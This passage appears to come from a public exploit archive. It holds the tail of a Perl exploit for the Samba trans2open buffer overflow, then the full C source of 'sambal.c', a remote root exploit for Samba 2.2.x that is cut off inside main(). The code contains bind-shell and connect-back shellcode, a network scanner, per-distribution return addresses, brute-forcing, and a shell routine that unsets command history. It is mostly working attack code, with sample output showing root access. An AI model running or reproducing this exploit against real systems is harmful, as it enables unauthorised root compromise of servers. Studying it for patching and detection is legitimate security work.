        "DDI!". ("\x00" x 277);

    return $exploit;
}

sub CreateBuffer_bsdx86 {
    my ($Host, $Port, $Return) = @_;

    my $RetAddr =  eval($Return);
    my $IckAddr = $RetAddr - 512;

    $RetAddr = pack("l", $RetAddr);
    $IckAddr = pack("l", $IckAddr);

    # IckAddr needs to point to a writable piece of memory

    my ($a1, $a2, $a3, $a4) = split(//, gethostbyname($Host));
    $a1 = chr(ord($a1) ^ 0x93);
    $a2 = chr(ord($a2) ^ 0x93);
    $a3 = chr(ord($a3) ^ 0x93);
    $a4 = chr(ord($a4) ^ 0x93);

    my ($p1, $p2) = split(//, reverse(pack("s", $Port)));
    $p1 = chr(ord($p1) ^ 0x93);
    $p2 = chr(ord($p2) ^ 0x93);

    my $exploit =
        # trigger the trans2open overflow
        "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
        "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90".

        GetNops(830) .

        # xor decoder courtesy of hsj
        "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01".
        "\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30".
        "\x93\x40\xe2\xfa".

        # reverse-connect, code by bighawk
        "\xa2\x5a\x64\x72\xc2\xd2\xc2\xd2\xc2\xc2\x23\xf2\x5e\x13\x1a\x50".
        "\xfb". $a1.$a2.$a3.$a4 ."\xf5\xfb". $p1.$p2.
        "\xf5\xc2\x1a\x75\x21\x83\xc1\xc5\xc3\xc3\x23\xf1\x5e\x13\xd2\x23".
        "\xc9\xda\xc2\xc0\xc0\x5e\x13\xd2\x71\x66\xc2\xfb\xbc\xbc\xe0\xfb".
        "\xfb\xbc\xf1\xfa\xfd\x1a\x70\xc2\xc7\xc0\xc0\x23\xa8\x5e\x13".

        GetNops(87) .

        "010101".
        $RetAddr.
        $IckAddr.
        $RetAddr.
        $IckAddr.
        "101010".

        "DDI!". ("\x00" x 277);

    return $exploit;
}

sub Unblock {
        my $fd = shift;
        my $flags;
        $flags = fcntl($fd,F_GETFL,0) || die "Can't get flags for file handle: $!\n";
        fcntl($fd, F_SETFL, $flags|O_NONBLOCK) || die "Can't make handle nonblocking: $!\n";
}

sub GoAway {
    exit(0);
}

sub ReadResponse {
    my ($s) = @_;
    my $sel = IO::Select->new($s);
    my $res;
    my @fds = $sel->can_read(4);
    foreach (@fds) { $res .= <$s>; }
    return $res;
}

sub HexDump {
    my ($data) = @_;
    my @x = split(//, $data);
    my $cnt = 0;

    foreach my $h (@x)
    {
        if ($cnt > 16)
        {
            print "\n";
            $cnt = 0;
        }

        printf("\\x%.2x", ord($h));
        $cnt++;
    }
    print "\n";
}

# thank you k2 ;)
sub GetNops {
    my ($cnt) = @_;
    my @nops = split(//,"\x99\x96\x97\x95\x93\x91\x90\x4d\x48\x47\x4f\x40\x41\x37\x3f\x97".
                        "\x46\x4e\xf8\x92\xfc\x98\x27\x2f\x9f\xf9\x4a\x44\x42\x43\x49\x4b".
                        "\xf5\x45\x4c");
    return join ("", @nops[ map { rand @nops } ( 1 .. $cnt )]);
}



# milw0rm.com [2003-04-07]
		

- Vulnerability Information (10)

Samba 2.2.8 Remote Root Exploit - sambal.c (EDBID:10)
linux remote
2003-04-10 Verified
139 eSDee
N/A
/*
    Remote root exploit for Samba 2.2.x and prior that works against 
    Linux (all distributions), FreeBSD (4.x, 5.x), NetBSD (1.x) and 
    OpenBSD (2.x, 3.x and 3.2 non-executable stack). 
    sambal.c is able to identify samba boxes. It will send a netbios
    name packet to port 137. If the box responds with the mac address
    00-00-00-00-00-00, it's probally running samba.
 
    [esdee@embrace esdee]$ ./sambal -d 0 -C 60 -S 192.168.0
    samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
    --------------------------------------------------------------
    + Scan mode.
    + [192.168.0.3] Samba
    + [192.168.0.10] Windows
    + [192.168.0.20] Windows
    + [192.168.0.21] Samba
    + [192.168.0.30] Windows
    + [192.168.0.31] Samba
    + [192.168.0.33] Windows
    + [192.168.0.35] Windows
    + [192.168.0.36] Windows
    + [192.168.0.37] Windows
    ...
    + [192.168.0.133] Samba

    Great!
    You could now try a preset (-t0 for a list), but most of the 
    time bruteforce will do. The smbd spawns a new process on every 
    connect, so we can bruteforce the return address...

    [esdee@embrace esdee]$ ./sambal -b 0 -v 192.168.0.133
    samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
    --------------------------------------------------------------
    + Verbose mode.
    + Bruteforce mode. (Linux)
    + Using ret: [0xbffffed4]
    + Using ret: [0xbffffda8]
    + Using ret: [0xbffffc7c]
    + Using ret: [0xbffffb50]
    + Using ret: [0xbffffa24]
    + Using ret: [0xbffff8f8]
    + Using ret: [0xbffff7cc]
    + Worked!
    --------------------------------------------------------------
  Linux LittleLinux.selwerd.lan 2.4.18-14 #1 Wed Sep 4 11:57:57 EDT 2002 i586
 i586 i386 GNU/Linux
    uid=0(root) gid=0(root) groups=99(nobody)

sambal.c : samba-2.2.8 < remote root exploit by eSDee (www.netric.org|

*/
  
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netdb.h>
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <unistd.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>

typedef struct {
        unsigned char type;
        unsigned char flags;
        unsigned short length;
} NETBIOS_HEADER;

typedef struct {
        unsigned char protocol[4];
        unsigned char command;
        unsigned short status;
        unsigned char reserved;
        unsigned char  flags;
        unsigned short flags2;
        unsigned char  pad[12];
        unsigned short tid;
        unsigned short pid;
        unsigned short uid;
        unsigned short mid;
} SMB_HEADER;

int OWNED = 0;
pid_t childs[100];
struct sockaddr_in addr1;
struct sockaddr_in addr2;

char
linux_bindcode[] =
        "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"
        "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc1\x31\xc0\x31\xdb\x50\x50"
        "\x50\x66\x68\xb0\xef\xb3\x02\x66\x53\x89\xe2\xb3\x10\x53\xb3\x02"
        "\x52\x51\x89\xca\x89\xe1\xb0\x66\xcd\x80\x31\xdb\x39\xc3\x74\x05"
        "\x31\xc0\x40\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb3\x04\xb0\x66\xcd"
        "\x80\x89\xd7\x31\xc0\x31\xdb\x31\xc9\xb3\x11\xb1\x01\xb0\x30\xcd"
        "\x80\x31\xc0\x31\xdb\x50\x50\x57\x89\xe1\xb3\x05\xb0\x66\xcd\x80"
        "\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80\x39\xc3\x75\x40\x31\xc0"
        "\x89\xfb\xb0\x06\xcd\x80\x31\xc0\x31\xc9\x89\xf3\xb0\x3f\xcd\x80"
        "\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0"
        "\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x8b\x54\x24"
        "\x08\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x31\xc0"
        "\x89\xf3\xb0\x06\xcd\x80\xeb\x99";

char
bsd_bindcode[] =
        "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0"
        "\x61\xcd\x80\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\xb0\xef\xb7\x02"
        "\x66\x53\x89\xe1\x31\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80"
        "\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x50\x57"
        "\x50\xb0\x6a\xcd\x80\x31\xc0\x31\xdb\x50\x89\xe1\xb3\x01\x53\x89"
        "\xe2\x50\x51\x52\xb3\x14\x53\x50\xb0\x2e\xcd\x80\x31\xc0\x50\x50"
        "\x57\x50\xb0\x1e\xcd\x80\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80"
        "\x39\xc3\x75\x44\x31\xc0\x57\x50\xb0\x06\xcd\x80\x31\xc0\x50\x56"
        "\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x56\x50\xb0\x5a\xcd"
        "\x80\x31\xc0\x43\x53\x56\x50\xb0\x5a\xcd\x80\x31\xc0\x50\x68\x2f"
        "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b"
        "\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x56\x50\xb0\x06\xcd\x80"
        "\xeb\x9a";

char
linux_connect_back[] =
        "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"
        "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51"
        "\x68\x41\x42\x43\x44\x66\x68\xb0\xef\xb1\x02\x66\x51\x89\xe7\xb3"
        "\x10\x53\x57\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
        "\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
        "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
        "\xb1\x02\xcd\x80\x31\xc0\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f"
        "\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
        "\x01\xcd\x80"; 

char
bsd_connect_back[] =
        "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0"
        "\x61\xcd\x80\x31\xd2\x52\x52\x68\x41\x41\x41\x41\x66\x68\xb0\xef"
        "\xb7\x02\x66\x53\x89\xe1\xb2\x10\x52\x51\x50\x52\x89\xc2\x31\xc0"
        "\xb0\x62\xcd\x80\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80"
        "\x31\xc0\x50\x52\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x52"
        "\x50\xb0\x5a\xcd\x80\x31\xc0\x43\x53\x52\x50\xb0\x5a\xcd\x80\x31"
        "\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54"
        "\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";



struct {
        char *type;
        unsigned long ret;
        char *shellcode;
        int os_type;    /* 0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD non-exec stack */

} targets[] = {
        { "samba-2.2.x - Debian 3.0           ", 0xbffffea2, linux_bindcode, 0 },
        { "samba-2.2.x - Gentoo 1.4.x         ", 0xbfffe890, linux_bindcode, 0 },
        { "samba-2.2.x - Mandrake 8.x         ", 0xbffff6a0, linux_bindcode, 0 },
        { "samba-2.2.x - Mandrake 9.0         ", 0xbfffe638, linux_bindcode, 0 },
        { "samba-2.2.x - Redhat 9.0           ", 0xbffff7cc, linux_bindcode, 0 },
        { "samba-2.2.x - Redhat 8.0           ", 0xbffff2f0, linux_bindcode, 0 },
        { "samba-2.2.x - Redhat 7.x           ", 0xbffff310, linux_bindcode, 0 },
        { "samba-2.2.x - Redhat 6.x           ", 0xbffff2f0, linux_bindcode, 0 },
        { "samba-2.2.x - Slackware 9.0        ", 0xbffff574, linux_bindcode, 0 },
        { "samba-2.2.x - Slackware 8.x        ", 0xbffff574, linux_bindcode, 0 },
        { "samba-2.2.x - SuSE 7.x             ", 0xbffffbe6, linux_bindcode, 0 },
        { "samba-2.2.x - SuSE 8.x             ", 0xbffff8f8, linux_bindcode, 0 },
        { "samba-2.2.x - FreeBSD 5.0          ", 0xbfbff374, bsd_bindcode,   1 },
        { "samba-2.2.x - FreeBSD 4.x          ", 0xbfbff374, bsd_bindcode,   1 },
        { "samba-2.2.x - NetBSD 1.6           ", 0xbfbfd5d0, bsd_bindcode,   1 },
        { "samba-2.2.x - NetBSD 1.5           ", 0xbfbfd520, bsd_bindcode,   1 },
        { "samba-2.2.x - OpenBSD 3.2          ", 0x00159198, bsd_bindcode,   2 },
        { "samba-2.2.8 - OpenBSD 3.2 (package)", 0x001dd258, bsd_bindcode,   2 },
        { "samba-2.2.7 - OpenBSD 3.2 (package)", 0x001d9230, bsd_bindcode,   2 },
        { "samba-2.2.5 - OpenBSD 3.2 (package)", 0x001d6170, bsd_bindcode,   2 },
        { "Crash (All platforms)              ", 0xbade5dee, linux_bindcode, 0 },
};

void shell();
void usage();
void handler();

int is_samba(char *ip, unsigned long time_out);
int Connect(int fd, char *ip, unsigned int port, unsigned int time_out);
int read_timer(int fd, unsigned int time_out);
int write_timer(int fd, unsigned int time_out);
int start_session(int sock);
int exploit_normal(int sock, unsigned long ret, char *shellcode);
int exploit_openbsd32(int sock, unsigned long ret, char *shellcode);

void 
usage(char *prog)
{
        fprintf(stderr, "Usage: %s [-bBcCdfprsStv] [host]\n\n"
                        "-b <platform>   bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)\n"
                        "-B <step>       bruteforce steps (default = 300)\n"
                        "-c <ip address> connectback ip address\n"
                        "-C <max childs> max childs for scan/bruteforce mode (default = 40)\n"
                        "-d <delay>      bruteforce/scanmode delay in micro seconds (default = 100000)\n"
                        "-f              force\n"
                        "-p <port>       port to attack (default = 139)\n"
                        "-r <ret>        return address\n"
                        "-s              scan mode (random)\n"
                        "-S <network>    scan mode\n"
                        "-t <type>       presets (0 for a list)\n"
                        "-v              verbose mode\n\n", prog);
        
        exit(1);
}

int
is_samba(char *ip, unsigned long time_out)
{
        char
        nbtname[]= /* netbios name packet */
        {
                0x80,0xf0,0x00,0x10,0x00,0x01,0x00,0x00,
                0x00,0x00,0x00,0x00,0x20,0x43,0x4b,0x41,
                0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
                0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
                0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
                0x41,0x41,0x41,0x41,0x41,0x00,0x00,0x21,
                0x00,0x01
        };

        unsigned char recv_buf[1024];
        unsigned char *ptr;

        int i = 0;
        int s = 0;

        unsigned int total = 0;

        if ((s = socket(PF_INET, SOCK_DGRAM, 17)) <= 0) return -1;

        if(Connect(s, ip, 137, time_out) == -1) {
                close(s);
                return -1;
        } 

        memset(recv_buf, 0x00, sizeof(recv_buf));

        if(write_timer(s, time_out) == 1) {
                if (write(s, nbtname, sizeof(nbtname)) <= 0) {
                        close(s);
                        return -1;
                }
        }

        if (read_timer(s, time_out) == 1) {
                if (read(s, recv_buf, sizeof(recv_buf)) <= 0) {
                        close(s);
                        return -1;
                }

                ptr = recv_buf + 57;
                total = *(ptr - 1); /* max names */

                while(ptr < recv_buf + sizeof(recv_buf)) {
                        ptr += 18;
                        if (i == total) {

                                ptr -= 19;                      

                                if ( *(ptr + 1) == 0x00 && *(ptr + 2) == 0x00 && *(ptr + 3) == 0x00 &&
                                     *(ptr + 4) == 0x00 && *(ptr + 5) == 0x00 && *(ptr + 6) == 0x00) {
                                        close(s);
                                        return 0;
                                }

                                close(s);
                                return 1;
                        }

                        i++;    
                }

        }
        close(s);
        return -1;
}

int 
Connect(int fd, char *ip, unsigned int port, unsigned int time_out) 
{
        /* ripped from no1 */

        int                      flags;
        int                      select_status;
        fd_set                   connect_read, connect_write;
        struct timeval           timeout;
        int                      getsockopt_length = 0;
        int                      getsockopt_error = 0;
        struct sockaddr_in       server;
        bzero(&server, sizeof(server));
        server.sin_family = AF_INET;
        inet_pton(AF_INET, ip, &server.sin_addr);
        server.sin_port = htons(port);

        if((flags = fcntl(fd, F_GETFL, 0)) < 0) {
                close(fd);
                return -1;
        }
  
        if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
                close(fd);
                return -1;
        }
        
        timeout.tv_sec = time_out;
        timeout.tv_usec = 0;
        FD_ZERO(&connect_read);
        FD_ZERO(&connect_write);
        FD_SET(fd, &connect_read);
        FD_SET(fd, &connect_write);

        if((connect(fd, (struct sockaddr *) &server, sizeof(server))) < 0) {
                if(errno != EINPROGRESS) {
                        close(fd);
                        return -1;
                }
        }
        else {
                if(fcntl(fd, F_SETFL, flags) < 0) {
                        close(fd);
                        return -1;
                }
                
                return 1;

        }

        select_status = select(fd + 1, &connect_read, &connect_write, NULL, &timeout);

        if(select_status == 0) {
                close(fd);
                return -1;

        }

        if(select_status == -1) {
                close(fd);
                return -1;
        }

        if(FD_ISSET(fd, &connect_read) || FD_ISSET(fd, &connect_write)) {
                if(FD_ISSET(fd, &connect_read) && FD_ISSET(fd, &connect_write)) {
                        getsockopt_length = sizeof(getsockopt_error);

                        if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_error, &getsockopt_length) < 0) {
                                errno = ETIMEDOUT;
                                close(fd);
                                return -1;
                        }

                        if(getsockopt_error == 0) {
                                if(fcntl(fd, F_SETFL, flags) < 0) {
                                        close(fd);
                                        return -1;
                                }
                                return 1;
                        } 

                        else {
                                errno = getsockopt_error;
                                close(fd);
                                return (-1);
                                }

                        }
                }
        else {
                close(fd);
                return 1;
        }

        if(fcntl(fd, F_SETFL, flags) < 0) {
                close(fd);
                return -1;
        }
        return 1;
}

int 
read_timer(int fd, unsigned int time_out)
{

        /* ripped from no1 */

        int                      flags;
        int                      select_status;
        fd_set                   fdread;
        struct timeval           timeout;

        if((flags = fcntl(fd, F_GETFL, 0)) < 0) {
                close(fd);
                return (-1);
        }

        if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
                close(fd);
                return (-1);
        }

        timeout.tv_sec = time_out;
        timeout.tv_usec = 0;
        FD_ZERO(&fdread);
        FD_SET(fd, &fdread);
        select_status = select(fd + 1, &fdread, NULL, NULL, &timeout);

        if(select_status == 0) {
                close(fd);
                return (-1);
        }

        if(select_status == -1) {
                close(fd);
                return (-1);
        }
  
        if(FD_ISSET(fd, &fdread)) {
  
                if(fcntl(fd, F_SETFL, flags) < 0) {
                        close(fd);
                        return -1;
                }
                
                return 1;

        } 
        else {
                close(fd);
                return 1;

        }
}

int
write_timer(int fd, unsigned int time_out)
{

        /* ripped from no1 */

        int                      flags;
        int                      select_status;
        fd_set                   fdwrite;
        struct timeval           timeout;

        if((flags = fcntl(fd, F_GETFL, 0)) < 0) {    
                close(fd);
                return (-1);
        }

        if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
                close(fd);
                return (-1);
        }
        
        timeout.tv_sec = time_out;
        timeout.tv_usec = 0;
        FD_ZERO(&fdwrite);
        FD_SET(fd, &fdwrite);

        select_status = select(fd + 1, NULL, &fdwrite, NULL, &timeout);

        if(select_status == 0) {
                close(fd);
                return -1;
        }

        if(select_status == -1) {
                close(fd);
                return -1;
        }

        if(FD_ISSET(fd, &fdwrite)) {
                if(fcntl(fd, F_SETFL, flags) < 0) {
                        close(fd);
                        return -1;
                }
                return 1;
        }
        else { 
                close(fd);
                return -1;
        }
}


void 
shell(int sock)
{
        fd_set  fd_read;
        char buff[1024], *cmd="unset HISTFILE; echo \"*** JE MOET JE MUIL HOUWE\";uname -a;id;\n";
        int n;

        FD_ZERO(&fd_read);
        FD_SET(sock, &fd_read);
        FD_SET(0, &fd_read);

        send(sock, cmd, strlen(cmd), 0);

        while(1) {
                FD_SET(sock,&fd_read);
                FD_SET(0,&fd_read);

                if (select(FD_SETSIZE, &fd_read, NULL, NULL, NULL) < 0 ) break;

                if (FD_ISSET(sock, &fd_read)) {

                        if((n = recv(sock, buff, sizeof(buff), 0)) < 0){
                                fprintf(stderr, "EOF\n");
                                exit(2);
                        }

                        if (write(1, buff, n) < 0) break;
                }

                if (FD_ISSET(0, &fd_read)) {

                        if((n = read(0, buff, sizeof(buff))) < 0){
                                fprintf(stderr, "EOF\n");
                                exit(2);
                        }

                        if (send(sock, buff, n, 0) < 0) break;
                }

                usleep(10);
        }

        fprintf(stderr, "Connection lost.\n\n");
        exit(0);
}

void
handler()
{
        int sock = 0;
        int i = 0;
        OWNED = 1;

        for (i = 0; i < 100; i++)
                if (childs[i] != 0xffffffff) waitpid(childs[i], NULL, 0);

        if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
                close(sock);
                exit(1);
        }

        if(Connect(sock, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) {
                fprintf(stdout, "+ Worked!\n"
                                "--------------------------------------------------------------\n");
                shell(sock);
                close(sock);
        }


}

int 
start_session(int sock)
{
        char buffer[1000];
        char response[4096];
        char session_data1[]    = "\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01\x00\x00\x00\x00";
        char session_data2[]    = "\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24\x25\x6e\x6f\x62\x6f\x64\x79"
                                  "\x00\x00\x00\x00\x00\x00\x00\x49\x50\x43\x24";

        NETBIOS_HEADER  *netbiosheader;
        SMB_HEADER      *smbheader;

        memset(buffer, 0x00, sizeof(buffer));

        netbiosheader   = (NETBIOS_HEADER *)buffer;
        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

        netbiosheader->type     = 0x00;         /* session message */
        netbiosheader->flags    = 0x00;
        netbiosheader->length   = htons(0x2E);

        smbheader->protocol[0]  = 0xFF;
        smbheader->protocol[1]  = 'S';
        smbheader->protocol[2]  = 'M';
        smbheader->protocol[3]  = 'B';
        smbheader->command      = 0x73;         /* session setup */
        smbheader->flags        = 0x08;         /* caseless pathnames */
        smbheader->flags2       = 0x01;         /* long filenames supported */
        smbheader->pid          = getpid() & 0xFFFF;
        smbheader->uid          = 100;
        smbheader->mid          = 0x01;

        memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data1, sizeof(session_data1) - 1);

        if(write_timer(sock, 3) == 1)
                if (send(sock, buffer, 50, 0) < 0) return -1;

        memset(response, 0x00, sizeof(response));

        if (read_timer(sock, 3) == 1)
                if (read(sock, response, sizeof(response) - 1) < 0) return -1;

        netbiosheader = (NETBIOS_HEADER *)response;
        smbheader     = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));

        if (netbiosheader->type != 0x00) fprintf(stderr, "+ Received a non session message\n");

        netbiosheader   = (NETBIOS_HEADER *)buffer;
        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

        memset(buffer, 0x00, sizeof(buffer));

        netbiosheader->type     = 0x00;         /* session message */
        netbiosheader->flags    = 0x00;
        netbiosheader->length   = htons(0x3C);

        smbheader->protocol[0]  = 0xFF;
        smbheader->protocol[1]  = 'S';
        smbheader->protocol[2]  = 'M';
        smbheader->protocol[3]  = 'B';
        smbheader->command      = 0x70;         /* start connection */
        smbheader->pid          = getpid() & 0xFFFF;
        smbheader->tid          = 0x00;
        smbheader->uid          = 100;

        memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data2, sizeof(session_data2) - 1);

        if(write_timer(sock, 3) == 1)
                if (send(sock, buffer, 64, 0) < 0) return -1;

        memset(response, 0x00, sizeof(response));

        if (read_timer(sock, 3) == 1)
                if (read(sock, response, sizeof(response) - 1) < 0) return -1;

        netbiosheader = (NETBIOS_HEADER *)response;
        smbheader     = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));

        if (netbiosheader->type != 0x00) return -1;

        return 0;
}

int
exploit_normal(int sock, unsigned long ret, char *shellcode)
{

        char buffer[4000];
        char exploit_data[] =
                "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x90";

        int i = 0;
        unsigned long dummy = ret - 0x90;

        NETBIOS_HEADER  *netbiosheader;
        SMB_HEADER      *smbheader;

        memset(buffer, 0x00, sizeof(buffer));

        netbiosheader   = (NETBIOS_HEADER *)buffer;
        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

        netbiosheader->type             = 0x00;         /* session message */
        netbiosheader->flags            = 0x04;
        netbiosheader->length           = htons(2096);

        smbheader->protocol[0]          = 0xFF;
        smbheader->protocol[1]          = 'S';
        smbheader->protocol[2]          = 'M';
        smbheader->protocol[3]          = 'B';
        smbheader->command              = 0x32;         /* SMBtrans2 */
        smbheader->tid                  = 0x01;
        smbheader->uid                  = 100;

        memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000);

        buffer[1096] = 0xEB;
        buffer[1097] = 0x70;

        for (i = 0; i < 4 * 24; i += 8) {
                memcpy(buffer + 1099 + i, &dummy, 4);
                memcpy(buffer + 1103 + i, &ret,   4);
        }

        memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), 
                        exploit_data, sizeof(exploit_data) - 1);
        memcpy(buffer + 1800, shellcode, strlen(shellcode));

        if(write_timer(sock, 3) == 1) {
                if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;
                return 0;
        }

        return -1;
}

int
exploit_openbsd32(int sock, unsigned long ret, char *shellcode)
{
        char buffer[4000];

        char exploit_data[] =
                "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x90";

        int i = 0;
        unsigned long dummy = ret - 0x30;
        NETBIOS_HEADER  *netbiosheader;
        SMB_HEADER      *smbheader;

        memset(buffer, 0x00, sizeof(buffer));

        netbiosheader   = (NETBIOS_HEADER *)buffer;
        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

        netbiosheader->type             = 0x00;         /* session message */
        netbiosheader->flags            = 0x04;
        netbiosheader->length           = htons(2096);

        smbheader->protocol[0]          = 0xFF;
        smbheader->protocol[1]          = 'S';
        smbheader->protocol[2]          = 'M';
        smbheader->protocol[3]          = 'B';
        smbheader->command              = 0x32;         /* SMBtrans2 */
        smbheader->tid                  = 0x01;
        smbheader->uid                  = 100;

        memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000);

        for (i = 0; i < 4 * 24; i += 4)
                memcpy(buffer + 1131 + i, &dummy, 4);

        memcpy(buffer + 1127, &ret,      4);

        memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER),
                        exploit_data, sizeof(exploit_data) - 1);

        memcpy(buffer + 1100 - strlen(shellcode), shellcode, strlen(shellcode));

        if(write_timer(sock, 3) == 1) {
                if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;
                return 0;
        }

        return -1;
}


int
main (int argc,char *argv[])
{
        char *shellcode = NULL;
        char scan_ip[256];

        int brute       = -1;
        int connectback = 0;
        int force       = 0;
        int i           = 0;
        int ip1         = 0;
        int ip2         = 0;
        int ip3         = 0;
        int ip4         = 0;
        int opt         = 0;
        int port        = 139;
        int random      = 0;
        int scan        = 0;
        int sock        = 0;
        int sock2       = 0;
        int status      = 0;
        int type        = 0;
        int verbose     = 0;

        unsigned long BRUTE_DELAY       = 100000;
        unsigned long ret               = 0x0;
        unsigned long MAX_CHILDS        = 40;
        unsigned long STEPS             = 300;

        struct hostent          *he;

        fprintf(stdout, "samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)\n"
                        "--------------------------------------------------------------\n");
        
        while((opt = getopt(argc,argv,"b:B:c:C:d:fp:r:sS:t:v")) !=EOF) {
                switch(opt) 
                {
                        case 'b':
                                brute = atoi(optarg);
                                if ((brute < 0) || (brute > 3)) {
                                        fprintf(stderr, "Invalid platform.\n\n");
                                        return -1;
                                }
                                break;
                        case 'B':
                                STEPS = atoi(optarg);
                                if (STEPS == 0) STEPS++;
                                break;
                        case 'c':
                                sscanf(optarg, "%d.%d.%d.%d", &ip1, &ip2, &ip3, &ip4);
                                connectback = 1;

                                if (ip1 == 0 || ip2 == 0 || ip3 == 0 || ip4 == 0) {
                                        fprintf(stderr, "Invalid IP address.\n\n");
                                        return -1;
                                }

                                linux_connect_back[33] = ip1; bsd_connect_back[24] = ip1;
                                linux_connect_back[34] = ip2; bsd_connect_back[25] = ip2;
                                linux_connect_back[35] = ip3; bsd_connect_back[26] = ip3;
                                linux_connect_back[36] = ip4; bsd_connect_back[27] = ip4;

                                break;
                        case 'C':
                                MAX_CHILDS = atoi(optarg);
                                if (MAX_CHILDS == 0) {
